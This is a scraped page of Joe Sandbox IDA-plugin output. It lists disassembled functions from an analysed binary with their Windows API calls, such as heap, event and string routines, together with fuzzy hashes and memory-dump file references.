Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: edf91192b3e3fcb4920683bdd4b317be175bdf2f9ef23b543487634f41fd2bf1
Instruction ID: 53f35d2e581fe16b3a61b6e6e0de15aad9ad974598886aca65bd3d3d3d964b74
Opcode Fuzzy Hash: edf91192b3e3fcb4920683bdd4b317be175bdf2f9ef23b543487634f41fd2bf1
Instruction Fuzzy Hash: 61B15E71D002189FDB20DFA8E885FDEBBB8EF48304F154529E905E7292D775A945CBA0

Function 009AC8F0 Relevance: 6.4, APIs: 5, Instructions: 146memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,00712507,BBFE6088,00000000,00000000,00000001,00000080,00C5183E,000000FF,?,00712507,BBFE6088), ref: 009AC9C7
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000000,00000001,00000080,00C5183E,000000FF,?,00712507,BBFE6088), ref: 009AC9DD
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000000,00000001,00000080,00C5183E,000000FF,?,00712507,BBFE6088), ref: 009AC9F3
HeapFree.KERNEL32(00000000,00712507,BBFE6088,00000000,00000000,00000001,00000080,00C5183E,000000FF,?,00712507,BBFE6088), ref: 009ACA34

Part of subcall function 009ACAB0: HeapFree.KERNEL32(00000000,00000000,00000000,BBFE6088,00000000,00000000,8007000E), ref: 009ACB4F

HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000000,00000001,00000080,00C5183E,000000FF,?,00712507,BBFE6088), ref: 009ACA8A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 45282c9a282a7764728df6930873fed6fb9f818ea615ddb8f1e3b7998a4f10cf
Instruction ID: c828fc0db7f205f76302a2f0c2b6fa7492ccd338ac239894e590b41b52c8adf9
Opcode Fuzzy Hash: 45282c9a282a7764728df6930873fed6fb9f818ea615ddb8f1e3b7998a4f10cf
Instruction Fuzzy Hash: E2516EB0A01209DBDB25CF55D985BAEBBB8FF4A710F244269E805AB395D731DD00CBE0

Function 0073C6A0 Relevance: 6.2, APIs: 4, Instructions: 247memorystringCOMMON

Download Yara Rule

APIs

strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,?,00000000), ref: 0073C83A
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,?,00000000), ref: 0073C964
HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0073CA1F
HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0073CA48

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?,00000002), ref: 0071F1FD

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?), ref: 0071F25E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$strcpy_s
String ID:
API String ID: 2606610500-0
Opcode ID: dae7ddf49d258af4432e7f1c11552563f66efe7fd31a2e980f2894cfd5f5350c
Instruction ID: dd646e347e836d59dbacb502d42f2ece039a6368ce3982b501823eb7b3ebc1cf
Opcode Fuzzy Hash: dae7ddf49d258af4432e7f1c11552563f66efe7fd31a2e980f2894cfd5f5350c
Instruction Fuzzy Hash: D7B17DB0901228DBEB25CF24CC497ADBBB4EF45314F1441D9E949AB292CB785F84CF99

Function 0097F330 Relevance: 6.2, APIs: 4, Instructions: 231windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

FormatMessageW.KERNEL32(00000002,?,BBFE6088,00000000,?,00000000,00DB62AC,?,00000004,00000000,BBFE6088,?,00000002,?,000000FF), ref: 0097F47D
FormatMessageW.KERNEL32(00000002,?,BBFE6088,00000000,00000000,00000000,00DB62AC,BBFE6088,?,00000002,?,000000FF,?,00972DF1,000010FF,00000000), ref: 0097F50A
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000,-00000002,00000004,00000000,?,00000002,?,000000FF,?,00972DF1,000010FF,00000000), ref: 0097F58E
LocalFree.KERNEL32(00000000,?,00000002,?,000000FF,?,00972DF1,000010FF,00000000), ref: 0097F5B5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FormatFreeMessage$HeapLocalwcscpy_s
String ID:
API String ID: 2823936367-0
Opcode ID: e686f751f1c12c3e89d7f94fc15e0196cfb4523ccb7fd23c829de4c90f5dbff8
Instruction ID: 8fe1d46063253710fd7aeb926ed2451093a1ece385bbb91d60a14d995019194b
Opcode Fuzzy Hash: e686f751f1c12c3e89d7f94fc15e0196cfb4523ccb7fd23c829de4c90f5dbff8
Instruction Fuzzy Hash: 57910775A006189FDB14DF98C895BAEBBF5EF48320F048529E91ABB390D774AD05CB84

Function 00A317A0 Relevance: 6.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969d9210712b72a8d34ca44e1a46a52bb732f7646b55543633ca2b9f647f321c
Instruction ID: 10e054236096779bb970c306e799e833e5857d888723e841b47bcb97496033b6
Opcode Fuzzy Hash: 969d9210712b72a8d34ca44e1a46a52bb732f7646b55543633ca2b9f647f321c
Instruction Fuzzy Hash: DB618B71E05209DFDB14CFA8D855BAEBBB4EF08314F10416AE909E7380DB75AE04CBA5

Function 008A8510 Relevance: 6.2, APIs: 4, Instructions: 152threadCOMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(00000001,00000000), ref: 008A85D4
SwitchToThread.KERNEL32 ref: 008A85DA
SleepEx.KERNEL32(00000001,00000000,BBFE6088,?), ref: 008A86BB
SwitchToThread.KERNEL32(BBFE6088,?), ref: 008A86C1

Part of subcall function 008B4F60: SetEvent.KERNEL32(03426908,03426878,00000001,008B4C54), ref: 008B4FD0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: SleepSwitchThread$Event
String ID:
API String ID: 834072129-0
Opcode ID: 25939879f571facc5c119947ecee4811af09c5900a095e638bc7bc7fb187512c
Instruction ID: 743ead5b57791e49b9e09d5f97dff18db7ec94a4fc8e25013fafb48bf5a0f713
Opcode Fuzzy Hash: 25939879f571facc5c119947ecee4811af09c5900a095e638bc7bc7fb187512c
Instruction Fuzzy Hash: 5D51B231A00604CFFB24CF19C988769B7A1FB96314F248629D956C7B90DF75EC81CBA1

Function 007DD420 Relevance: 6.1, APIs: 4, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 0096F380: GetProcessHeap.KERNEL32(?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002,00000002), ref: 0096F38C
Part of subcall function 0096F380: RtlAllocateHeap.NTDLL(03400000,00000000,00000002,?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002), ref: 0096F3AA

InitializeCriticalSection.KERNEL32(00000008,00000129), ref: 007DD481
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007DD4EE
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000129), ref: 007DD589
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000129), ref: 007DD5E0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CreateEvent$Heap$AllocateCriticalInitializeProcessSection
String ID:
API String ID: 2365403526-0
Opcode ID: 8f0af6e69ca3074d6db03231d1a2cf5dc3eb60e1aec2d3bbd9e2ceb26df37d07
Instruction ID: 9d2c32dcbf210949d17e9d7bc06371f19fbe82c8315884dbbc675550640ce0e6
Opcode Fuzzy Hash: 8f0af6e69ca3074d6db03231d1a2cf5dc3eb60e1aec2d3bbd9e2ceb26df37d07
Instruction Fuzzy Hash: 9251BCB0901746EBE720CF64D90574ABBF0BB42724F20431AE565AB7D0E7B9AA44CBD1

Function 00A1D670 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,00000002,?,00000001,000000A8,?), ref: 00A1D72F
HeapFree.KERNEL32(00000000,?,000000A8,?), ref: 00A1D7D9
HeapFree.KERNEL32(00000000,?,000000A8,?), ref: 00A1D7F5

Strings

NULL, xrefs: 00A1D6B5, 00A1D754

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 89515af4f2bb405dcd2d3df4740e29fe49a32ba65d543ae1ecb65181a239abb8
Instruction ID: 138087a73d2d84c605a838460242e8156034e260e3f02ab729b3be018ebe84a8
Opcode Fuzzy Hash: 89515af4f2bb405dcd2d3df4740e29fe49a32ba65d543ae1ecb65181a239abb8
Instruction Fuzzy Hash: E951BE35A00208DBEB20DFA4DC85FEEBBB9EB45700F144169E805EF295DB71AD44CB90

Function 00974610 Relevance: 6.1, APIs: 4, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

iswspace.API-MS-WIN-CRT-STRING-L1-1-0(-00000002,BBFE6088,00C7A98C,00000000,?), ref: 00974679
iswspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00974697
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,-00000001,00000000,-00000002), ref: 00974720
HeapFree.KERNEL32(00000000,00000000), ref: 0097475F

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: iswspace$FreeHeapwcsncpy_s
String ID:
API String ID: 2518314069-0
Opcode ID: bb6caded376a2265b3b05989fab587a43398c6e1104da780bc010ea7df21f421
Instruction ID: c5f8adbdaa291caf085e7134dc61c36b01d6d323f06bad7719424ffeda9042ff
Opcode Fuzzy Hash: bb6caded376a2265b3b05989fab587a43398c6e1104da780bc010ea7df21f421
Instruction Fuzzy Hash: 2841B177E00205DBCB14CF69D9057AEB7F9EB85310F16822AE819E7781EB35DA00CA91

Function 00765DE0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(BBFE6088), ref: 00765E27
SetLastError.KERNEL32(?,?), ref: 00765F98

Strings

CLRVectoredExceptionShim: mismatch of cached and current stack-base indicating use of Fibers, return with EXCEPTION_CONTINUE_SEARCH: current = %p; cache = %p, xrefs: 00765F08
CLRVectoredExceptionHandlerShim: returning %d, xrefs: 00765F73

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLast
String ID: CLRVectoredExceptionHandlerShim: returning %d$CLRVectoredExceptionShim: mismatch of cached and current stack-base indicating use of Fibers, return with EXCEPTION_CONTINUE_SEARCH: current = %p; cache = %p
API String ID: 1452528299-526770326
Opcode ID: 06f22b9f07d7b90ea267b24657f688cac75f6a4a88faa55342085c6fae62686d
Instruction ID: 4e845a1a753c96151777ca4a3080471f34946ff0eb56f4261a7da9d8f1348012
Opcode Fuzzy Hash: 06f22b9f07d7b90ea267b24657f688cac75f6a4a88faa55342085c6fae62686d
Instruction Fuzzy Hash: 88515571A00A41DFCB20DBA4DC89BDDB7F5EF08700F104129F906AB291DBB89D04DBA1

Function 00830760 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 008307F3
ResetEvent.KERNEL32(03450D38), ref: 00830807
SetEvent.KERNEL32(03450CB8), ref: 00830814
GetTickCount64.KERNEL32 ref: 0083083F

Part of subcall function 00905290: LeaveCriticalSection.KERNEL32(008307B7,?,008307B7), ref: 009053B3

Part of subcall function 008B4F60: SetEvent.KERNEL32(03426908,03426878,00000001,008B4C54), ref: 008B4FD0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Event$Count64Tick$CriticalLeaveResetSection
String ID:
API String ID: 1526793349-0
Opcode ID: d85519e3da8694f8820dffe4f0dd8ab5d55539c4b3ff58679547135630f65a8d
Instruction ID: 6211ff923f4eb1b7497ddcf75688de3945ab147a50a21b1f9091ce4264505315
Opcode Fuzzy Hash: d85519e3da8694f8820dffe4f0dd8ab5d55539c4b3ff58679547135630f65a8d
Instruction Fuzzy Hash: 3C41BE35601704EBDB209B68DC597A9B7A0FB86724F14432AE825D73E1CBB5A844CFD1

Function 007D7AE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,BBFE6088,00000000), ref: 007D7BCC

Strings

ei}, xrefs: 007D7AF7, 007D7BD2, 007D7BDE
$h}, xrefs: 007D7BDF
ei}, xrefs: 007D7BEB

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: $h}$ei}$ei}
API String ID: 3298025750-4023563376
Opcode ID: 4a4ed81f03bce55074783d3a3bed119103d57cdf72c8042ed496234b848d43b6
Instruction ID: dc97d567f689fe7283ccf6fe40b5fa60f413490c9df32168774cd4ce5a4c4140
Opcode Fuzzy Hash: 4a4ed81f03bce55074783d3a3bed119103d57cdf72c8042ed496234b848d43b6
Instruction Fuzzy Hash: 8D3121B1A00208ABDB14DFA4D885F9EB7B8EF48314F184166E505E7391EA759944CBA0

Function 009807C0 Relevance: 6.1, APIs: 4, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00D00B01,000000FF,00000000,00000000,BBFE6088), ref: 0098082A
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,00D00B01,000000FF,00000000,00000000,00000000), ref: 0098085F
OutputDebugStringW.KERNEL32(00000000), ref: 00980874
HeapFree.KERNEL32(00000000,00000000), ref: 00980894

Part of subcall function 0071D720: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,0083858C), ref: 0071D74B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharFreeHeapMultiWide$DebugOutputString
String ID:
API String ID: 3187996580-0
Opcode ID: 1283b4072f20ab738fa199f8bdafa674f4182f9215e68ae526078a385d89f9c9
Instruction ID: bf85205e033557c693772971ed84c19357d427d6c578235bd22ae5a7b7f276d7
Opcode Fuzzy Hash: 1283b4072f20ab738fa199f8bdafa674f4182f9215e68ae526078a385d89f9c9
Instruction Fuzzy Hash: EE218331500264ABE7309F65EC4DB9FBBB8EB45760F100369E419963D0DB759904CB90

Function 009FD210 Relevance: 6.1, APIs: 4, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

CoTaskMemFree.OLE32(00000000), ref: 009FD22F
HeapFree.KERNEL32(00000000,?), ref: 009FD261
CloseHandle.KERNEL32(?,?,009D8D84), ref: 009FD27E
FreeLibrary.KERNEL32(?), ref: 009FD29B

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
